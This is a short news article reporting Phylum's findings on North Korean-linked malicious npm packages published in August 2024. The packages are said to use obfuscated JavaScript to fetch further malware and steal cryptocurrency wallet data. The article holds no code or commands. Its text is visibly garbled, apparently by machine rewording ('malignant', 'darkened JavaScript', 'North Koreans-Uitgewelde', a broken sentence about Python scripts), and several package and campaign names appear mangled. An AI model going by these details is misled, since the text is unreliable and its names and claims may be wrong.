A recent increase in malignant activities involved in North Korean threat groups has been identified by researchers from CyberSecurity and revealed a coordinated campaign aimed at the NPM ecosystem.
The campaign started on August 12, 2024 and included publishing malignant NPM packages designed to infiltrate developer environments and steal sensitive data.
The newly discovered packages, including Temp-Etherscan-api, Ethers scan-api and Telegram-Con, display advanced tactics such as multi-phases of obscured Javascript that downloads extra malware from external servers.
Malignant NPM packages
According to a blog post published by Phylum Today, the Malware Python scripts and a full Python interpreter, which search for data in cryptocurrency wallet browser extensions while the persistence on the affected systems is determined. In particular, the QQ console package is attributed to a well-known North Korean campaign called ‘contagious interview’.
Researchers identified another package, helmet-validate, published on August 23, 2024, which uses another attack method. It adds JavaScript code to that malignant code and performs from an external end point, IPCHeck[.]cloud. This domain is linked to earlier North Korean operations, including fake job campaigns using the Mirotalk[.]Net domain, which emphasizes a pattern of recurring tactics.
The most recent package, SASS notification, was published on 27 August 2024 and is linked to the “Moonstone Sleet” campaign. This package uses darkened JavaScript to perform scripts that download, decode and perform the external loads while traces of malignant activity are removed, making some harmless software.
Read more about North Korean cyber threats: North Korean hackers who track down journalists e-mails to spy on policy experts
Increasing NPM exploitation by threat actors
Phylum warned these attacks underlined the increasing exploitation of NPM by threat actors to jeopardize developer systems.
“The diversity and simultaneous deployment of these attack vectors reveal a coordinated and ruthless campaign by North Koreans-Uitgewelde threat actors,” the company said.
“These opponents are constantly exploiting inherent trust in the NPM ecosystem to compromise developers, infiltrate companies and steal cryptocurrency or other assets that can lead to illegal financial profit.”